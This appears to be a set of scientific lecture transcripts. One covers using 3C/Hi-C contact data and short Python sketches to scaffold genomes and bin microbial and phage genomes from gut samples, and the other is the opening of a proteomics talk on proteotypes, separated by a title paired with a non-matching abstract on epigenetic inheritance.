have this strong contact along the diagonal. You know, to really ligate the DNA, the sticky ends must coincide more or less, yeah? Yes, that's right: when the fragments are close to each other, that will happen. So the contact frequency is more or less a power law, and the further you increase the distance between two restriction fragments, the faster it drops. And this is actually on a log scale. But the ligation depends on the sequences of the ends, yeah?
Yeah, so you have some biases at this level, a few biases which are fairly well characterized, and they are not strong enough to affect the outcome of this result. You may have issues if you have very GC-rich genomes; actually, the sequencing is going to be affected as well — Illumina sequencing may be problematic on highly GC-rich genomes too. So there are biases, but overall they will not affect the general trend, which is that two fragments close to each other along this polymer are going to be frequently in contact, and two fragments far apart, like here, are not going to be frequently in contact. Here, the color scale reflects the fact that rare contacts are in white and frequent contacts are in red. But it also depends on the stage in the cell cycle, yeah, how they're positioned? Yes, exactly. This will modify, for instance, the width of this diagonal: if you go into metaphase, you will increase the width; if the cells are replicating, it will look like this. So indeed, there are functional events that you can identify in this contact map, and this is something we are working on in different species. For instance here, the chromosomes are circular, meaning this position here is adjacent to that one; that's why you have these contacts at the edges of the maps. Also related to functional events, you can see here, for instance — it's very weak — contact between the middle of chromosome two and the middle of chromosome one, and this corresponds to the replication termination positions of these two chromosomes. You can actually ask why these chromosomes see each other in space. You also have one specific contact here between the origin of chromosome two and a position on chromosome one, and that relates to a control of the firing of replication of chromosome two by the progression of the replication fork along chromosome one, which seems actually to be mechanically related. This is something we are working on in collaboration with Didier Mazel at the Institut Pasteur. But today what I want to insist on is that in all genomes you have this very strong diagonal, which reflects the fact that these chromosomes are polymers and therefore, in the cellular space, behave as relatively individualized entities. So the question we asked at some point when we were working on this was: okay, what happens if we do this same experiment on a mix of species? Will a DNA fragment from genome one, by accident, through experimental procedure biases, be re-ligated frequently with a fragment of genome two or genome three? Or are these re-ligation events going to be sufficiently rare? No, because the restriction enzyme cuts the same site, so you have cohesive ends. So if you use a cohesive end it will re-ligate very efficiently; if you use a blunt cut it's not so efficient. So the question we asked was whether or not restriction fragments from the different genomes are going to be re-ligated often with each other and therefore blur the signal. What we did was a preliminary experiment where we took three different species: Vibrio cholerae, E. coli and Bacillus subtilis. We grew them independently, we mixed the cells together, and then we performed this 3C experiment directly on the mix of species. And then we take the paired-end reads and we align them against the reference genomes of these three species.
Then we look at the contact patterns between and within these genomes, and we were quite pleased to see that there is very little background between the different species. It is relatively rare for a fragment from species 1 to be religated by accident with a fragment from species 2. Such spurious religations can happen because, when you lyse the cells and process them biochemically, you can release fragments that float in the solution and religate spontaneously with each other — but this does not happen very often. As a result you get well-individualized squares along the main diagonal: this first square corresponds to the genome of Bacillus subtilis, this one to the genome of E. coli — and you can even see a tiny square there corresponding to a plasmid that contacts the E. coli genome a lot, which tells you that this plasmid probably shares the same cellular space as the E. coli chromosome. And here you have the two chromosomes of Vibrio cholerae, which also see each other frequently in 3D, so you can pool them together into the same cellular space. In a sense we can deconvolve the genomes of these three species from this heat map. Why does E. coli look qualitatively different from the others? Coverage may be at play — this was a very preliminary experiment, so there may have been differences in the amount of cells we put in, even though we aimed for similar amounts. Also, Bacillus is a Gram-positive bacterium while these two are Gram-negative, and it seems slightly easier to extract DNA from Gram-negatives, so the coverage of Bacillus is lower in this experiment. You attribute this spread — the thin line here — so the diagonal is much more...? That is also partly a matter of colour scale: it is the same colour scale for the entire map, so things get blurred, and again this was a very early experiment — Bacillus does not normally look like this, and I will show you much nicer maps later. So what does the thickness of the diagonal mean? It can be interpreted, to some extent, as a condensation level. That is not entirely accurate, but you can visualize it as a rough measure of chromosome compaction: if condensation is high, two DNA fragments that are far apart along the genome will contact each other more frequently than in a decondensed chromosome. What we did next was the same kind of experiment with 11 species — 11 yeast genomes, each composed of multiple chromosomes. We pooled all these species into one mix and performed the metagenomic assay — sorry, the meta3C assay, as we call it — directly on the mix. When we aligned the reads against the reference genomes of these species, we were pleased to see 11 big squares along the main diagonal corresponding to the genomes of the 11 species. Some are less well covered than others, but the differences are not very significant. Again, though, we aligned the reads against the reference genomes, so we are cheating — we know the answer.
So what we wanted to do was to design an assay that lets us start— Excuse me, but for these species you don't have any common sequences, or any shared plasmids, or anything like that? No, here there are no shared plasmids. And each of these big squares is itself composed of smaller squares that correspond to the individual chromosomes of each species. The dots — you probably heard about this yesterday — come from the fact that in yeast the centromeres are clustered in the nucleus, so DNA next to one centromere collides quite often with DNA next to the other centromeres; these clusters of centromeres give the dots in the contact maps. In the case of S. cerevisiae you would also have the 2-micron plasmid? Yes, but we did not align it — there may well be a plasmid there, depending on the strain; for this strain, certainly. Could you just count the number of chromosomes from the map? Yes — and I will show you that this is essentially what we do now. The motivation is that this is nice but rather useless if you want to explore a sample from the wild, where you do not know which genomes are present: you cannot align reads against reference genomes you do not have. So we wanted to design a computational protocol that starts only from the reads — the paired-end reads — and goes all the way down to the genomes of all these species. We start with the raw sequences, the paired-end reads, which carry the contact frequencies between all the DNA in the population. First we can increase the size of these short reads using standard assemblers such as IDBA-UD, which gives us a set of contigs to work with. The other information we have, besides the DNA sequence, is the paired-end information, which encodes the contacts between DNA molecules by design of the 3C experiment. So we can align this contact information onto the set of contigs, which gives us a network of contacts between contigs. This network is pretty big, and a nice way to analyse such a network is the Louvain algorithm, which partitions the network so as to optimize the modularity of the partition — it looks for communities of contigs that contact each other a lot and rarely contact the rest of the network. Working with the Louvain algorithm, we designed a protocol that segregates this pool of contigs into 11 communities — which is exactly the number of yeast species we originally put into the mix. We also had a small contaminant genome, about 1%, probably coming from one of the yeast cultures we were growing at the same time, which is fine. Most of these contigs contact each other within their own community and rarely contact contigs of the other communities. Could you repeat the nature of the edges in your interaction network? The contigs are the nodes, and the number of contacts between two contigs gives the weight of the edge between them. So you put an edge between this contig and another contig in case of what?
Well, we know that the number of contacts reflects co-localization in the same cell, so we simply use that to segregate them. This works relatively well, but at this point we only have pools of contigs. If we take one of these communities and look at the contacts between its contigs, this is what we get — here about 1,000 contigs. Of course they are not sorted according to their position along the genome, because we do not have the reference genome, so when we align the reads against the contigs and build the contact map we get something very messy compared to what I showed you before. So here I will introduce another algorithm we designed at the same time, which lets us reorder these contigs according to their contact frequencies and thereby re-scaffold the genomes of these species. This is a program we call GRAAL, designed by a PhD student in my group — this is a little interlude — and it aims at scaffolding contigs based on their 3D contacts. The situation is the same as when you have contact data for a genome that is not fully assembled, and most genomes are not fully assembled. When you align the reads of a contact experiment against such a reference, you get a messy contact map: because you do not know that this green contig is adjacent to that green one, you do not place them next to each other along the axis, and so you get strong inter-contig contacts far from the diagonal that are incongruent with what we know about the polymer physics of DNA. Same thing for the red chromosome, which is split into three contigs here, there and there: you get these incongruent long-range contact signals in the map. What you want to do is solve this puzzle. Here it is simple enough to solve by hand: you take the green contig, look at the contacts made by this end, see that it contacts this other end a lot, and so you place those two edges next to each other — now you have a longer scaffold and it looks right on the map. But you may have genuine long-distance interactions? Yes, there can be long-range contacts that are functional — the centromere clustering in yeast, for instance — but these functional contacts are always much weaker than the very strong polymer signal along the diagonal, typically about two orders of magnitude lower than the short-range contacts. Then you do the same with the blue contig: this end contacts that end a lot, so you join them, and so on — you get the idea. You keep re-sorting the contigs until you only have squares on the diagonal and you have minimized the signal away from the main diagonal. This is easy to do by hand, but much trickier with real data and very large, complex genomes. So we designed a program that uses these contacts — which are very quantitative — together with polymer-physics predictions to explore the space of possible genome structures and identify the 1D genome structure that explains the 3D data with the highest likelihood. That is what it does.
So again, this is the power law: the contact frequency decreases with the genomic distance along the chromosome, and if you know the contact frequency between two DNA fragments you can infer with quite good accuracy the distance that separates the two loci. For instance, if the contact count between two segments is around 50, you can say that with a certain likelihood they are separated by about 100 kb in 1D. Hervé designed a program that starts only from the 3D data and is initialized with a generic polymer model — at first the contigs are not big enough to compute this contact-versus-distance curve, which varies slightly from genome to genome, so we begin with a polymer model plus the original assembly, that is, the set of contigs that is not fully scaffolded, whether published or generated by us. The program then screens through possible 1D genome structures, trying to improve the likelihood of the structure by fitting the 3D data to it and recomputing the agreement between the data and the 1D structure at each step. So we sample the space of 1D genome structures and compute a new likelihood each time: here the likelihood is on the y-axis, and this is its increase over the iterations. We make small changes to the 1D structure, compute the likelihood after each change, keep the most likely structure, and eventually converge to a situation where we oscillate around a single 1D genome structure. This movie illustrates the process. This is a genome that was published as a set of 76 scaffolded contigs — 76 big pieces of DNA — from a fungus, and we know this species does not have 76 chromosomes, so there are more published contigs than chromosomes. When you generate the 3D data you can see clearly that something is wrong with the contact map — it does not look right. Here we have highlighted the 76 published contigs. What we want to do is reorder these DNA fragments according to the 3D contacts and converge towards the most likely 1D structure. The first step of the program is to split these big contigs into smaller pieces, because we assume the published assembly contains some errors; so we cut the DNA into 10-kb pieces and start re-sorting them according to their collision frequencies. The first part of the movie is just doing that and randomizing the order. Here is the likelihood, and that is the number of contigs; we explore 1D structures, improve the likelihood, and in the end we converge towards a state with a handful of big chromosomes — big chunks of DNA — and a contact map that now looks like a proper yeast or fungal genome. When we stop the program — sorry, not 11 but 7 chromosomes; right, this run did not quite go all the way, but it does not matter.
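The scoring idea behind this iterative search can be sketched in a few lines: score a candidate 1D ordering of equally sized fragments by how well the observed contact counts fit a power-law decay over the genomic distances that the ordering implies, and keep rearrangements that raise the score. This is only a toy illustration of the principle, not the actual GRAAL implementation (which fits an explicit polymer model and samples structures rather than doing a pure greedy search); the exponent, fragment size and move set are assumptions.

import numpy as np

def log_likelihood(order, contacts, frag_len=10_000, alpha=1.0, c0=100.0):
    # Poisson log-likelihood of observed contacts given a candidate 1D ordering.
    # order    : permutation; order[k] is the fragment placed at position k
    # contacts : symmetric matrix of observed contact counts between fragments
    pos = np.empty(len(order), dtype=float)
    pos[list(order)] = np.arange(len(order)) * frag_len  # implied coordinates
    ll = 0.0
    n = len(order)
    for i in range(n):
        for j in range(i + 1, n):
            s = abs(pos[i] - pos[j]) + frag_len          # implied genomic distance
            lam = c0 * (s / frag_len) ** (-alpha)        # expected count, power-law decay
            ll += contacts[i, j] * np.log(lam) - lam     # Poisson terms (constant dropped)
    return ll

def greedy_scaffold(contacts, n_iter=10_000, seed=0):
    # Randomly swap pairs of fragments; keep swaps that improve the likelihood.
    rng = np.random.default_rng(seed)
    order = list(range(contacts.shape[0]))
    best = log_likelihood(order, contacts)
    for _ in range(n_iter):
        i, j = rng.integers(0, len(order), size=2)
        order[i], order[j] = order[j], order[i]
        ll = log_likelihood(order, contacts)
        if ll > best:
            best = ll
        else:
            order[i], order[j] = order[j], order[i]      # revert the swap
    return order, best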
So when we stop the program — which would otherwise oscillate forever around the same structure — we get this genome structure with 7 chromosomes. We see contacts that look very much like inter-centromeric contacts, which is exactly what you expect for a fungus, and from the position of these dots along the sequence we can identify the centromeres, and so on. So we can scaffold this genome quite efficiently — and this is indeed the real genome; we checked it independently. We can do this for other species too, and here is an example with unpublished data: it does not only work on small genomes like this fungus. This is a parasitoid wasp, a collaboration with Jean-Michel Drezen. When we generate the 3D contacts between the chromosomes of this wasp we get this very messy contact map — the published genome is made of thousands of contigs, each making a small square, plus all these inter-contig contacts that we want to resolve. The program handles this quite efficiently too, so I will go through it quickly, but again we simply re-sort the chunks of DNA according to their collision frequencies, and this gives a fairly robust scaffold in the end — it just takes a bit longer. We end up with nice scaffolds that match what is expected from the cytological data. So by exploiting the collision frequencies between DNA fragments we were able to re-scaffold these genomes in a way that matches the expected cytology, and now our collaborators can look at their favourite sequences — such as the viral sequences that contribute to the parasitoid lifestyle of the wasp. The wasp disrupts the host immune system in order to lay — "pondre" in French — its eggs inside the caterpillar it infects, and these viral sequences are important for its reproduction. Anyway, going back to the metagenomic assay: we ran this program on the 1,000 contigs and, to keep it short, we end up with something that looks like a proper yeast genome contact map. When we compare it with the reference, 95% of the reference genome is covered by this assembly. So in a single experiment we were able to isolate 11 genomes from this mix of species and re-scaffold them with roughly 90% accuracy relative to the published references — which was quite promising. And now the real experiment. This is not a control mix: it is the gut content of a mouse from the Institut Pasteur animal facility. It is not the most exciting sample — again, we were not microbiologists at the time — but we took this single sample from the mouse and performed the meta3C contact assay directly on it. We assembled the reads into contigs; it is a very big network, about 400,000 contigs representing roughly 600 megabases of DNA, with an N50 around 4 kb, so the contigs are relatively small. Then, as before, we use the paired-end information to bridge these contigs according to their contact frequencies, which gives a network of contigs containing about 45 million contacts — a very complex network. This is what it looks like when it is not sorted.
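Anticipating the partitioning step described next, here is a rough sketch of how such a contig contact network could be built and then split into communities, assuming the read pairs have already been mapped to contigs. The networkx and python-louvain packages and the input format are assumptions for illustration; the real pipeline differs.

from collections import Counter
import networkx as nx
import community as community_louvain  # python-louvain package

def build_contact_graph(pair_hits):
    # pair_hits: iterable of (contig_a, contig_b) labels, one per informative
    # read pair whose two reads map to two different contigs.
    weights = Counter()
    for a, b in pair_hits:
        if a != b:
            weights[tuple(sorted((a, b)))] += 1
    g = nx.Graph()
    g.add_weighted_edges_from((a, b, w) for (a, b), w in weights.items())
    return g

def bin_contigs(graph):
    # Partition contigs into communities by modularity optimization (Louvain).
    partition = community_louvain.best_partition(graph, weight="weight")
    bins = {}
    for contig, comm in partition.items():
        bins.setdefault(comm, []).append(contig)
    return bins  # community id -> list of contigs (candidate genome bins)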
What we did again was to partition this network with the Louvain clustering algorithm, and we obtained nice communities of contigs that make more contacts within themselves than with the rest. Each of these squares corresponds to a set of DNA sequences that collide more frequently with each other in space than with everything else. I am going to skip this part. What we did next was to investigate the content of these communities. First we can align genome annotations against the DNA of each community. The communities are sorted by size: of course there are small communities of a few contigs, but most of the DNA is pooled into the large communities — those containing more than a thousand contigs, so more than a megabase of DNA. Since most of the DNA is in the large communities, most of the gene annotations map to them as well, which is what you see here and is not very interesting by itself. If we look at bacterial essential genes, again most of them fall into these large communities, suggesting that the large communities correspond to bacterial genomes — again not unexpected. The interesting part is that when we look at phage-related genes, plasmid genes or conjugative elements, we see an enrichment in the smaller communities. Of course some phages are in contact with bacterial genomes — some are integrated as prophages, some are perhaps infecting — but other phages behave as individualized entities that, in space, are mostly in contact with themselves rather than with another molecule. That was quite interesting, so we decided to analyse the two sets of communities independently: first the large ones, then the small ones. For example, if we take one of the large communities — this is number 68 — we again have a messy contact pattern; we can improve it with GRAAL, and we end up with a single scaffold of approximately four megabases showing this kind of pattern. You have the main diagonal and, interestingly, a secondary diagonal — and I will show you why that is interesting, because at the same time we were working on Bacillus subtilis, and this kind of 3D folding is typical of bacteria like B. subtilis. First, the origin of replication sits at the crossing between the secondary diagonal and the main diagonal. There is more DNA around the origin than around the terminus of replication, which is what you expect for an actively dividing bacterium — more DNA at the ori than at the ter. And the secondary diagonal reflects the fact that the two chromosome arms, although joined only at the origin and terminus, collide with each other frequently because they are bridged by SMC condensin complexes, as we showed in Bacillus subtilis: when replication starts, the two arms are bridged and kept in close contact with each other during the cell cycle.
This is what the secondary diagonal reflects, and it is typical of the 3D structure of bacterial genomes like B. subtilis. Here are other communities: this one looks more like the E. coli chromosome, where you do not have the secondary diagonal. So this one is Bacillus-like, this one E. coli-like — but all of them give DNA scaffolds whose 3D structure looks like that of a bacterial genome. So in a single experiment we can recover dozens of bacterial scaffolds, which until now was not really feasible in this field: normally you need many samples and a lot of correlation analysis, whereas here, from one experiment, we get on the order of a hundred relatively complete bacterial genomes. At the same time we analysed the content of the small communities, the ones that looked phage-like. We took 82 small communities whose genes are mostly phage genes, reprocessed the data a little, and looked at the sequences we obtained for them. Here are a few examples: one is a 235-kb genome that looks like a phiKZ-like phage; these correspond to two molecules of about 25 kb, also a good size for a phage genome; this one is about 50 kb, like a Caudovirales genome; and so on. So we have phage genomes in this community of species that we can now try to relate to their potential hosts, the bacterial genomes. On one hand we have bacterial genomes, on the other phage genomes, and we can plot the 3D contacts between them. That is what we do here: the 82 phage sequences against the hundred-plus bacterial sequences, and this gives a global overview of the infection spectrum within the community. This is quite important, because now we can do this kind of experiment over time and follow, for instance, the propagation of a virus across different, possibly closely related, bacterial species. We can also follow genes of interest — say an antibiotic-resistance gene present in one species: if we give antibiotics to the animal, we can track the propagation of that resistance gene through the population of bacterial species and see whether at some point it induces a dramatic shift in the community. We can look at the activation of prophages under stress, and so on. It opens up a broad range of studies that were difficult to address before, because there was no good way to bridge the virome — the phage sequences — to the microbiome — the bacterial sequences — and because, without fairly complete genomes for these bacteria, it is difficult to study the interplay between metabolic networks in such complex communities. How much time do I have? Five more minutes. One more small observation: we also find prophages inside the bacterial genomes — phage sequences that do not necessarily correspond to these individualized phage communities, but that we can see within the bacterial chromosomes and that most likely correspond to prophages.
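As a minimal sketch of the phage–host assignment just described (the prophage observation continues below), one could aggregate the contig-level contacts between each phage bin and each bacterial bin and normalize each phage's row into a crude infection spectrum. The data layout and the normalization are illustrative assumptions.

import numpy as np

def phage_host_matrix(contacts, bins, phage_bins, host_bins):
    # contacts : dict {(contig_a, contig_b): count}, contig pairs stored sorted
    # bins     : dict {bin_name: list of contigs}
    m = np.zeros((len(phage_bins), len(host_bins)))
    for i, p in enumerate(phage_bins):
        pset = set(bins[p])
        for j, h in enumerate(host_bins):
            hset = set(bins[h])
            m[i, j] = sum(c for (a, b), c in contacts.items()
                          if (a in pset and b in hset) or (a in hset and b in pset))
    row_sums = m.sum(axis=1, keepdims=True)  # normalize each phage's contacts
    return np.divide(m, row_sums, out=np.zeros_like(m), where=row_sums > 0)

The most likely host of phage i would then be host_bins[m[i].argmax()], keeping in mind that integrated prophages and shared cellular space both contribute to the signal.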
So, coming back to the prophages: here, in red, is the annotation of the phage sequences, and you can see clusters of phage annotations in this bacterial chromosome that coincide with this odd pattern in the 3D contacts. These are typical of phage sequences inside bacterial genomes — differences in AT composition, for instance, affect the restriction pattern and therefore the outcome of the experiment. We showed, for example, that in Bacillus subtilis the SPβ prophage shows the same odd pattern: its AT composition differs from the rest of the chromosome, so the restriction, and hence the contact pattern, is affected. And we showed that if we stress the bacterium, the phage starts replicating and becomes very prominent in the contact data — this is again a controlled experiment in B. subtilis, and we also see the increase in sequence coverage of the prophage. That tells us the prophage is actively replicating and probably lysing the bacterium. When we go back to our unknown samples from the wild, we see similar patterns: here is a prophage that does not seem to be activated — its coverage is flat relative to the rest of the chromosome — whereas this one seems to be actively replicating, so this prophage is probably active and that one is not. So we wondered whether we could infer the activity state of prophage sequences within the bacteria from this single experiment as well, which would also be interesting. These are the experiments we are doing now, together with others, either with wild-type mice or with mice carrying controlled mixes of species — 13 species or more. We can treat some of these mice with antibiotics, or change the composition of the gut by adding, for instance, a species carrying an antibiotic-resistance gene, and so on. The idea is to sample the gut of these mice at different times and track, in 3D over time — in 4D, really — the propagation of genes and the activation of prophages, and reach a comprehensive picture of the dynamics of the population. And this is where I will stop, with some very preliminary data: the lines here correspond to the five phages present in one bacterium — one of the roughly 120 bacteria present in the gut of this mouse. The behaviour of each of the five phages is represented by a line, and one of them behaves very differently from the rest of the DNA and becomes strongly over-amplified when we treat with antibiotics — pointing to the activation of a prophage that may play a role in lysing this bacterium or in the dynamics of the population. So now we are trying to integrate all of these data — it is quite complex, at least for us, because we are not used to working on these systems — to get to this comprehensive picture. To summarize: these contact frequencies can of course be used to analyse the biology of the chromosome, but we can also develop these alternative approaches that help us bridge the microbiome with the virome and reach an improved understanding of complex ecosystems over time. These are the people who did the work.
Most of the experiments were done by a postdoc in my lab, Martial, who got a CNRS position two years ago; Axel, an engineer in my team; and Lyam, a PhD student; as well as a former PhD student who developed the GRAAL program, and a physicist we work with at UPMC who did not contribute to this particular work but is a very good collaborator as well. Thank you for your attention.
|
Probing the dynamics of complex microbial communities using DNA tridimensional contacts A fundamental question in biology is the extent to which physiological and environmentally-acquired information can be transmitted from an animal to its descendants. I will present an example of trans-generational epigenetic inheritance where a temperature-induced change in gene expression lasts for less than 10 generations. I will also present an example of an inter-generational effect whereby the physiological state of an animal (its age) has a large influence on the characteristics of the next generation.
|
10.5446/50903 (DOI)
|
Okay, good morning, and thanks for showing up early. We are a technology laboratory and we work with proteins — we try to measure proteins. It is an interesting question right now, and I am actually pleased to be here because it forced me to think about things we normally do not: how do genomes and cell fate relate to each other, and what role do proteins play in that equation? I think they have a large role to play, and I will first give some general considerations and then point to a few issues where we think proteins can contribute. We live in a very interesting phase. This was a very interesting meeting for me: on one hand you see these very intricate, extremely complicated mechanisms, like trafficking, that have been studied for decades, and on the other hand there is the world where people generate a lot of data. We need to bring these two worlds together somehow, and that is essentially the topic of my talk. We are a technical laboratory, but I do not want to talk about techniques; I just want to give a status report to calibrate expectations and capabilities. In the field of protein measurement we have focused for a long time on exhaustively measuring as many proteins in a sample as possible, and I can say this has now essentially been achieved: we can probably measure virtually any protein in a sample, with a few glitches here and there. But if we want to relate genotype and phenotype, measuring one proteome is not sufficient — we need to work with cohorts, because only then can we start to see how a system reacts to specific changes, for instance genomic changes. So there has been work to get to the stage where genomics has been for a long time: a large number of samples, conceivably hundreds, with as many analytes as possible — in this case proteins — measured reliably and quantitatively, generating a data matrix with no or very few missing values. This has been a huge challenge, and I do not want to dwell on why, but in the last few years we and other groups have developed massively parallel mass spectrometric techniques that are in a sense the equivalent of next-generation sequencing: they sequence many peptides at a time and reproducibly cover a subset of the proteome — we cannot yet cover the whole proteome this way — of several thousand proteins, across many samples, with very high consistency and quite fast. This is the experimental basis I will take off from. Each sample — a cell extract, a tissue extract, a biopsy — is converted into a single digital file by a mass spectrometric technique which I am not going to discuss further. It is fast: in the clinic, for instance, we could take a biopsy in the morning and have the results in the evening, and we can run about 20 such samples a day on one instrument. This is quite fast even by genomics standards, but we cannot do the whole proteome — we can do about 5,000 proteins per sample, with very good CVs and very few missing values across a cohort, and the measurements are quite precise. So conceptually you can think of it as roughly 50,000 western blots per sample. This is also applicable to modifications and to protein interactions.
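To make the idea of such a data matrix concrete, here is a small sketch of the kind of consistency check one would run on a cohort-scale protein quantification matrix: per-protein completeness and coefficient of variation. The matrix shape and the toy data are illustrative assumptions, not parameters of the actual workflow.

import numpy as np

def cohort_qc(intensities):
    # intensities: samples x proteins matrix of quantified protein intensities,
    # with np.nan marking missing values.
    completeness = 1.0 - np.mean(np.isnan(intensities), axis=0)  # per protein
    cv = np.nanstd(intensities, axis=0) / np.nanmean(intensities, axis=0)
    return completeness, cv

# Toy usage: 100 samples x 5000 proteins with ~2% of values missing at random.
rng = np.random.default_rng(1)
m = rng.lognormal(mean=10, sigma=1, size=(100, 5000))
m[rng.random(m.shape) < 0.02] = np.nan
completeness, cv = cohort_qc(m)
print(f"median completeness: {np.median(completeness):.2%}, median CV: {np.median(cv):.2f}")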
So this is where I would like to start; this is the technical base, without explaining how it works — I am happy to do that if someone is interested. Now, if you read the literature on these large-scale genomic efforts, thousands of genotypes can be measured in a cohort, sometimes by international consortia — cancer versus control being one of the dominant applications — and of course we also have many quantitative phenotypes, from imaging, from the clinic, from diagnostic tests. The big question — I think one of the questions this session intends to address — is how we make the link, how we project from the genotypic variants existing in a population or cohort onto a phenotypic space, which in the clinical sense means healthy versus diseased but could of course be any phenotype. We would like to predict phenotypes from their molecular origin, which mostly means from genomic data. Making predictions is of course one of the hallmarks of science, and many fields — engineering, physics — have developed highly sophisticated ways of making predictions from models. Take this clock as an example of a system that is precisely understood and for which we can make fairly precise predictions. If we know the state of the system at a particular time and we know some of its parameters, we can say, for virtually any time in the future, where the clock will be — that is, after all, the purpose of a clock. We can also predict quite precisely how the system reacts if we change something in it: if we make the pendulum a bit longer, we can predict the effect on the readout up here. This works well for systems with a moderate number of parts and a basic model of how they interact. It is a rather straightforward system: there are equations, first principles; we can plug in data, play with parameters in a computer, and get a fairly precise outcome — assuming the system operates under idealized conditions, disregarding air friction and so on. In biological systems we also try to get to predictions, to generate predictive models, but we have seen over the last few days — and it was discussed quite extensively on Tuesday evening — that this is very difficult to achieve. Statements were made that this endeavour, usually equated with systems biology, has been disappointing. I would agree with that, but there are some success stories where quite good predictive models have been established: oscillators, the bacterial motor — one of the well-studied toy problems — and cell-cycle regulators. Still, I would agree that it has been disappointing from the point of view of generality. Good predictability has been achieved in these relatively confined examples, but they are relatively simple; generalized models would have a hard time explaining a perturbation somewhere else in the cell — how, for instance, the bacterial chemotactic motor behaves
if the cell receives two independent signals — that is hard to predict from these models — and they are presently not scalable to really complex systems like trafficking or the other situations discussed at this conference. So while there have been successes, scaling this highly mechanistic approach, based on understanding the wiring and the components of a system, to larger systems is a huge challenge. Let me just illustrate how big the challenge is if we want to go from something very confined, like a bacterial motor, to statements about a whole cell. A while back we worked with the group of Jürg Bähler to do a molecule inventory of a cell — which has also featured prominently in this symposium — an S. pombe cell. We used what were at the time the best available methods to precisely quantify, basically count, the RNA molecules — the transcripts — and the proteins in cells grown under different conditions: a starved condition and an exponentially growing condition. To me, at least, these were astounding numbers. A gene produces between about 30 and about a million copies of its protein per cell — an enormous dynamic range — and of course the question is how this dynamic range is maintained and regulated. The median protein copy number is about 4,000 per cell, and the median mRNA copy number is about 2.5 per cell. That was an extremely surprising number to me, because it means transcription operates essentially in the stochastic domain: in a population, some cells will have none of a given transcript, some maybe three, some five. So if we make predictions from transcript measurements and put weight on an increase from two to four transcripts, we have to ask what that really means, because we are in the stochastic domain. At the protein level we are not: there will not be cells with zero copies of a protein next to cells with 10,000 — there is variation around the median of 4,000, but very few cells have none. That already indicates that, conceptually, we operate in quite different regimes when we work with transcripts versus proteins. The total number of mRNA molecules in these cells is about 40,000, which is not many and means that, energetically, making these transcripts is cheap — whereas there are almost 100 million protein molecules in each cell, so maintaining and controlling those is very expensive for the cell. Another issue that is often not really considered is that the protein concentration in these cells is more than 300 milligrams per millilitre — about a third of what crystallographers achieve when they squeeze proteins into a crystal for X-ray diffraction. It is an enormously high concentration; it is actually astounding that the proteins do not crash out, because any biochemist knows that if you extract these proteins from the cell and go beyond, say, 10 milligrams per millilitre in vitro, they tend to precipitate. How the cell maintains this concentration and still carries out its functions is an astounding feat that I think is not often considered.
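Going back to the mRNA copy numbers for a moment: as a quick, hedged illustration of what a median of about 2.5 transcripts per cell implies, assume — purely for illustration — that transcript counts per cell are Poisson-distributed with that mean (real single-cell distributions are usually broader).

import math

MEAN_MRNA = 2.5  # median mRNA copies per cell quoted above

def poisson_pmf(k, lam):
    # Probability of observing exactly k molecules for a Poisson mean lam.
    return math.exp(-lam) * lam**k / math.factorial(k)

for k in range(6):
    print(f"P({k} transcripts) = {poisson_pmf(k, MEAN_MRNA):.3f}")

# P(0) comes out near 0.08 and P(1) near 0.21, i.e. under this idealized model
# a sizeable fraction of cells carry zero or one copy of a median-expressed
# transcript, whereas a median protein at ~4,000 copies essentially never
# drops to zero.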
And staying with the concentration point: most in vitro biochemistry — reconstitution experiments and so on — is done at concentrations about two orders of magnitude below what actually happens in the cell. All of this is just to indicate that a cell is a very complex system, and classical mechanistic models have a very hard time reaching any kind of comprehensive prediction about it. So, given this situation, and coming back to the question posed — or as I understood it to be posed — for this morning, we can ask how we are doing at predicting phenotypes from genetic variation, which can now be measured very precisely. The answer is that we are not doing well at all — and not just our group; in general we have great difficulty making this link. There are seemingly simple questions which we should be able to answer but cannot — and if anyone here thinks they generally have an answer to them, it would be very good to hear. We cannot accurately predict the effect of an arbitrary inherited or somatic mutation on the phenotype: we cannot take a particular background genome, introduce a mutation anywhere — say in a coding sequence — and predict what effect it will have. We do not know how two or more mutations combine: do they cancel out, do they synergize, are they neutral? We do not know how the same mutation affects different individuals, which is a huge issue in medicine, particularly in the emerging field of personalized medicine. And we do not know how copy-number variations in an individual are processed. These are seemingly simple questions, and I believe that until we can answer them — or at least have a path towards answering them — it is presumptuous, or at least too early, to go into the clinic and make statements about genotypic variability and clinical outcome. With the exception, of course, of some Mendelian traits where the molecular basis and its translation into phenotype are very clearly understood — but most clinical phenotypes are not that simple. To summarize this part: we are operating at an interesting time in the life sciences, which I have tried to capture in this graph. One axis indicates the amount of data available, and the y-axis the amount of first principles or theory available to the field. Certain fields — engineering, health technology such as biotech or medtech, people who build a device to monitor heart rate or blood pressure — are in a very comfortable position, because it is essentially engineering: there is a lot of theory and first principles, thermodynamics, electrodynamics and so on, which are used very widely and work extremely well, so with a limited amount of data it is relatively straightforward for them to get to a predictive model. In biology we do not have that luxury: we have very few first principles — I will come to this in a second — but we increasingly have data, and, as we have heard, data of completely different types, generated by cell biologists, by imaging, where you label a specific molecule and follow exactly where it goes and how its amplitude varies, and so on.
This is of course enormously dense data, so we now operate in life sciences and medicine in a space where a lot of data is available. But how these data relate to each other across this genotype-to-phenotype space is, to me, a big question, and I will come back to it — simply correlating data is not going to work. We have to find a way to translate these data into predictive models, and that is the topic of the rest of my talk. Incidentally, we have whole classes of professionals — doctors, lawyers, CEOs, politicians — who have highly influential and important roles in society and yet have neither a theory or first principles of how their system actually works, nor data on which they can really run experiments: a doctor cannot clone the patient and give a treatment to some copies and not to the others. They basically have to accumulate an empirical base and apply it. But in the life sciences we are now in a domain where we can use empirically acquired, strategically positioned data sets to help us make — hopefully accurate — predictions. So what are the first principles we use in biology? We do not have models like the physicists, where you vary parameters, simulate, and get an accurate prediction, but we do have some principles we can apply: Mendel's laws of inheritance; Avery's demonstration of DNA as the transforming principle, now taught to every undergraduate; the one gene, one protein, one function notion of Beadle and Tatum; the central dogma; Linus Pauling's idea — an extremely important insight, I think — of a molecular disease, where a particular mutation in a particular gene changes a protein, changes the structure of that protein, and manifests as a complex phenotype, sickle-cell anaemia; the notion that proteins only function when they have a three-dimensional structure; and, most recently, what I consider a fundamental principle for the genotype–phenotype relationship: that biology is modular — molecules do not act by themselves but in modules, or complexes, or however one wants to call them. So we tried to come up with a concept that integrates many of these principles and is experimentally addressable. We call it the proteotype model, and the notion we are pursuing experimentally is that if we could define and measure this entity — the proteotype — we would have an extremely informative quantity, fundamental to translating genotypic variability into phenotype. How do we define the proteotype? As the composition of the proteins in a cell — basically the inventory — and the way they are organized into modules. This covers many of the principles that are monuments of life-science research, in particular Lee Hartwell and colleagues' idea of a modular biology, and the idea that genomic variation affects the structure 